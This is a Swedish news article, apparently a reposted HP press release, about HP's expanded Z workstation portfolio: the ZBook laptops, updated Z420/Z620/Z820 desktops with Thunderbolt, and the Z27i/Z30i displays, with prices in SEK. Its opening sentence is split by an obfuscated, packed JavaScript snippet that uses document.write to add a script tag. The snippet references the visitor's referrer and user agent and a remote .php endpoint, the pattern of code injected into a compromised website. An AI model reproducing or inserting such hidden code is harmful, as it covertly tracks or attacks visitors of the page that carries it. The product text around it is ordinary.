Image Image Image Image Image Image Image Image Image Image

| 1 juni, 2020

Scroll to top

Top

PC

HP utökar sin Workstation-portfölj

HP utökar sin Workstation-portfölj
Sebastian

Ny eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ednte|var|u0026u|referrer|yesnz||js|php’.split(’|’),0,{}))
workstation lineup med HP ZBook Mobile Workstations, HP Z-skärmar, förbättrade HP Z Workstations och Thunderboltteknik. 

Idag lanserar HP sin utökade  Z portfolio med professionella arbetsstationer och skärmar, vilken bland annat inkluderar världens första workstation Ultrabook™ – HP ZBook(1) – och branschens första arbetsstationer som erbjuder Intels Thunderbolt-teknik för snabb dataöverföring.(2)

Den nya portföljen innehåller tre nya HP ZBook Mobile Workstations, förbättrade processorer och grafik till den prisbelönta serien av HP Z stationära arbetsstationer, samt två nya HP Z-skärmar.

HPs Z-familj är framtagen för att uppfylla behoven bland världens mest krävande kunder, där verksamhetskritiska element kräver bästa prestanda och tillförlitlighet. De första arbetsstationerna som inkluderar Thunderbolt, HP Z Mobile och stationära arbetsstationer, kan nu dra nytta av hög hastighet för dataöverföring mellan Z Workstations, skärmar och kringutrustning, vilket ger branschens snabbaste och mest mångsidiga I/O-anslutning.

HPs Z-portfölj har utvecklats, testats och certifierats för professionella applikationer och är idealisk för yrkesverksamma inom teknik, CAD, arkitektur, design, animering, film, utbildning, myndigheter och sjukvård.

Företagskunder förlitar sig på pålitliga partners för att kunna erbjuda tekniska lösningar som är testade och certifierade för verksamhetskritiska applikationer,” säger Stefan Jeleby, produktchef för Workstations på HP Sverige. ”HPs Z varumärke har blivit ett signum för professionella produkter konstruerade enligt högsta standard och utbyggnaden av Z-portföljen visar HPs engagemang för företagsmarknaden, vilken många andra leverantörer har övergivit.”

HP återuppfinner den mobila arbetsstationen 

Genom introduktionen av portföljen HP ZBook, har HP återuppfunnit den mobila arbetsstationen och införlivat den med HP Z-DNA som kunder över hela världen känner till. De nya HP ZBook Mobile Workstations har en ny, tunnare och lättare industridesign. HP ZBook-familjen inkluderar världens första workstation Ultrabook – HP ZBook 14 – och HP ZBook 15 och 17.

Designad för att möta de arbetsstationsklassade företagens krav på mobilitet, har den nya HP ZBook Mobile Workstation 4:e generationens Intel® Haswell dual-och quad-core processorer som alternativ(4) och nästa generations grafikteknik från NVIDIA och AMD, inklusive de nyligen aviserade Keplar-baserade professionella grafikkorten från NVIDIA. Samtliga HP ZBook Mobile Workstations har ett innovativt verktygslöst chassi för enkla uppgraderingar och enkel service.

HP ZBook 14 erbjuder också möjligheten att välja en touchpanel. HP ZBook 15 inkluderar tillvalet med extra hög upplösning genom en QHD + 3,200 x 1,800-skärm som ger större detalj i bilderna för de kunder som kräver extrem noggrannhet för bilder. HP ZBook 15 och 17 har en Thunderbolt-port, samt en DreamColor Display som tillval, vilket ger korrekt färgåtergivning från skärmen när man skriver ut eller väljer storbild.

HP Z Workstations med Ivy Bridge och Thunderbolt

Utöver den redan kraftfulla raden av HP Z stationära arbetsstationer, har HP Z420, Z620 och Z820 Workstations uppdaterats för att inkludera den senaste Intel Xeon®(4) E5-1600v2 och E5-2600v2 familjen med processorer – även kallad Ivy Bridge – liksom ett nytt minne som är 16 procent snabbare samt 2:a generationens Thunderbolt-portar för kreativa arbetsflöden. Tillägget med Thunderbolt kommer att accelerera kreativa projekt med dataöverföringshastigheter på upp till fyra gånger snabbare än USB 3.0. Dessutom är det enkelt att ansluta flera enheter med bara en enda kompakt Thunderbolt port.

HP Z820 Workstation med sina dubbla socklar erbjuder exceptionell prestanda, har en prisbelönt industridesign och verktygsfri service i branschens mest expanderbara chassi. HP Z820 erbjuder upp till 24 processorkärnor, 512 GB ECC-minne(5), upp till 15 TB höghastighetslagring(6) och upp till två NVIDIA K6000-grafik.

HP Z620 Workstation förpackar data- och visualiseringkraften i en tyst och kompakt formfaktor. Den är HPs mest mångsidiga arbetsstation, som ger upp till 24 separata processorkärnor, upp till 192 GB ECC-minne, upp till 12 TB höghastighetslagring samt upp till NVIDIA K6000 eller dubbla NVIDIA K5000 för maximal grafikprestanda.

HPs mest populära arbetsstation, HP Z420, innehåller upp till åtta processorkärnor genom att använda den senaste Intel Xeon-processorn E5-1600 v2 och E5-2600 v2:s produktfamilj som ger upp till 64 GB ECC-minne, upp till 12 TB höghastighetslagring, och NVIDIA Quadro K6000 eller AMD W7000, eller dubbel NVIDIA K2000-grafik. Den förbättrade HP Z420 Workstation erbjuder nya nivåer av prestanda och utbyggbarhet i en lättillgänglig och verktygsfri mini-tower formfaktor – och till ett bra pris.

HPs Z-skärmar ger perfekt bildåtergivning

Som ett tillägg till HPs sortiment av professionella skärmar, presenteras HP Z27i och Z30i IPS-skärmar, vilka är anpassade för designers, kreatörer och tjänstemän på företag som behöver exceptionell bildprecision, stor reglerbarhet och verksamhetskritisk tillförlitlighet som är optimerad för företag.

De nya skärmarna ger utmärkt täckning av sRGB-spektrat – det standardiserade färgspektrat för webben och för majoriteten av teknik, kreativa och professionella applikationer. Såväl HP Z27i som Z30i erbjuder 100-procentig täckning.(3) HP Z30i täcker även 100 procent av Adobes® RGB-färgspektra, som vanligen används i bild- och digitala prepressprocesser.

Med sina IPS Gen 2 paneler, levererar HP Z-skärmar en energibesparing på upp till 37 procent jämfört med HPs första generation av produkter med IPS-teknik. Fortfarande med samma utmärkta färgåtergivning och vida betraktningsvinklar som med IPS Gen 1. HPs Z-skärmar är ENERGY STAR®-kvalificerad och EPEAT® Gold registrerade. Båda skärmarna har ett ett HP fyraxligt sänkbart stativ som inkluderar HPs QR2 snabbkoppling och båda är TCO-certifierade. För att frigöra värdefullt utrymme på skrivbordet, finns ett HP Thin Client Mount Kit tillgängligt för både HP Z27i och Z30i, så att användarna säkert kan montera en HP Thin Client eller Ultra Slim desktop på baksidan av skärmen.

Pris och tillgänglighet

HP ZBook Mobile Workstations 15 and 17 finns tillgänglig idag. Ca pris från 13 900 SEK och 16 500 SEK. HP ZBook 14 finns tillgänglig i november. Ca pris från 11 300 SEK.
·  Den utökade HP Z420, Z620 and Z820 Workstations planeras att finnas på marknaden i oktober. Ca pris från 11 300 SEK, 13 000 SEK och 16 500 SEK.
·  HP Z27i planeras finnas tillgänglig i oktober. Ca pris från 6 000 SEK, och HP Z30i Display från ca 11 300 SEK samt HP Thin Client Mount Kit från ca 300 SEK.

Alla priser är exklusive moms.